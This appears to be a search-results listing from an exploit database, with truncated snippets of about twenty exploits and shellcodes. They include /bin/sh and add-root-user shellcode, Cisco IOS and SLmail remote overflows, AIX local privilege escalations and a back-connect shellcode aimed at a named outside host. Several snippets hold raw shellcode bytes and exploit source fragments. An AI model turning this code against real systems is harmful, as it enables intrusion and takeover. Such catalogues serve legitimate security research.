47 matches found
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Exploit Title: Linux/x86 - execve /bin/sh ShellCode 25 bytes Author: bolonobolo Vendor Homepage: None Software Link: None Tested on: Linux x86 CVE: N/A / global start section .text start: cdq ; xor edx mul edx lea ecx, eax mov esi, 0x68732f2f mov edi, 0x6e69622f push ecx ; push NULL in stack push...
Cisco IOS - Remote Code Execution Exploit
Exploit for hardware platform in category remote exploits !/usr/bin/env python if False: ''' CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution =================== This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service...
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Cisco Ios
CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code exe...
Linux/x86-64 - Add root user with password - 390 bytes
No description provided by source. / Title: Linux/x86-64 - Add root user with password - 390 bytes Date: 2010-06-20 Tested: Archlinux x8664 k2.6.33 Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/shellstorm ! Dtabase of shellcodes http://www.shell-storm.org/shellcode/ Add...
OpenBSD ftp Exploit (teso)
No description provided by source. / 7350-crocodile - x86/OpenBSD ftp exploit by lorian and scut / TESO=20 TESO CONFIDENTIAL - SOURCE MATERIALS This is unpublished proprietary source code of TESO Security. The contents of these coded instructions, statements and computer programs may not be...
linux/x86 SET_PORT() portbind 100 bytes
Exploit for linux/x86 platform in category shellcode ======================================= linux/x86 SETPORT portbind 100 bytes ======================================= /--------------------------------------------------------------------------- 100 byte Portbind shellcode by Benjamin Orozco -...
Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit
No description provided by source. / gexp-powerd.c Power Daemon v2.0.2 Remote Format String Exploit Copyright C 2005 Gotfault Security Bug found and developed by: barros and xgc Original Reference: http://gotfault.net/research/exploit/gexp-powerd.c / include getopt.h include sys/types.h include...
netbsd/x86 setreuid0, 0; execve"/bin//sh", ..., NULL; 29 bytes
netbsd/x86 setreuid0, 0; execve"/bin//sh", ..., NULL; 29 bytes. Shellcode exploit for netbsdx86 platform / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid0, 0; execve"/bin//sh", ..., NULL; note: unsafe shellcode, but 29 bytes long; doesn't work if eax & 0x40000000 != 0; / includ...
AIX 5.2 - 'netpmon' Local Privilege Escalation
/ IBM AIX netpmon elevated privileges exploit I just wanted to play with PowerPC Tested on 5.2 intropy intropy caughq.org / include include include include define DEBUG 1 define BUFFERSIZE 2048 define EGGSIZE 2048 define NOP 0x60 define ADDRESS 0x2ff22fff-BUFFERSIZE/2 char shellcodebinsh =...
MS Internet Explorer ""mshtml.dll"" CSS Parsing Buffer Overflow
No description provided by source. / Taken from http://www.securiteam.com/exploits/5NP042KF5A.html The exploit will create a .CSS file that should be included in an HTML file. When a user loads the HTML file, Internet Explorer will try to parse the CSS and will trigger the buffer overflow. /...
Typespeed 0.4.1 - Local Format String
// source: https://www.securityfocus.com/bid/12569/info typespeed is prone to a local format string vulnerability. Successful could allow privilege escalation. / Proof of Concept local exploit for typespeed tool "enva" content: include include int mainint argc, char argv char addrptr = NULL;...
Setuid perl PerlIO_Debug() overflow
Exploit for linux platform in category local exploits =================================== Setuid perl PerlIODebug overflow =================================== / Copyright Kevin Finisterre Setuid perl PerlIODebug overflow Tested on Debian 3.1 perl-suid 5.8.4-5 11:07:20 corezion: who is tha man wit...
Exim <= 4.41 dns_build_reverse Local Exploit PoC
Exploit for linux platform in category local exploits ================================================ Exim int main int argc, char argv static char shellcode= "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"...
Seattle Lab Mail (SLmail) 5.5 - POP3 PASS Remote Buffer Overflow (2)
Seattle Lab Mail SLmail 5.5 - POP3 PASS Remote Buffer Overflow 2 include include include include include include include include include include define retadd "\x9f\x45\x3a\x77" /win2k server sp4 0x773a459f/ define port 110 / revshell العراق القراصنة المجموعة/ char shellcode =...
AIX 5.1 < 5.3 - paginit Local Stack Overflow
/ exploit for /usr/bin/paginit tested on: AIX 5.2 if the exploit fails it's because the shellcode ends up at a different address. use dbx to check, and change RETADDR accordingly. cees-bart / define RETADDR 0x2ff22c90 char shellcode = "\x7c\xa5\x2a\x79" "\x40\x82\xff\xfd" "\x7c\xa8\x02\xa6"...
Aspell (word-list-compress) Command Line Stack Overflow
Exploit for linux platform in category local exploits ======================================================= Aspell word-list-compress Command Line Stack Overflow ======================================================= / Fuck private exploits . Fuck iranian hacking and security !! teams who are...
WS_FTP Server <= 5.03 MKD Remote Buffer Overflow Exploit
No description provided by source. / no@0x00:/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test Ipswitch WSFTP Remote buffer overflow exploit by NoPh0BiA. x Connected to: 10.20.30.2 on port 21. x Sending Login..done. x Sending bad code..done. x Checking if exploitation was successful.. ...
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)
Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Discovered by : Muts Coded by : Muts WWW.WHITEHAT.CO.IL Plain vanilla stack overflow in the SELECT command import struct import socket from time import sleep s = socket.socketsocket.AFINET, socket.SOCKSTREAM Lame calc.exe shellcode - dont expect...
stackShell.txt
hi, im posting here a manner for avoiding stackguard. Shellcode without zeros. // /Shellcode avoiding stack protections sample--------Vallez/29a/ // / All we have listened about stack protections. Security products are protecting stacks of code executed there. New hardware too, that will not let...
bsd/x86 connect 93 bytes
Exploit for bsd/x86 platform in category shellcode ======================== bsd/x86 connect 93 bytes ======================== / the back-connect shellcode. The destination addr is 0x28402ec3 rootteam.host.sk port is 0x8ae 2222. size = 93 bytes little isn't it? Greetz 2 sp00fed written by dev0id...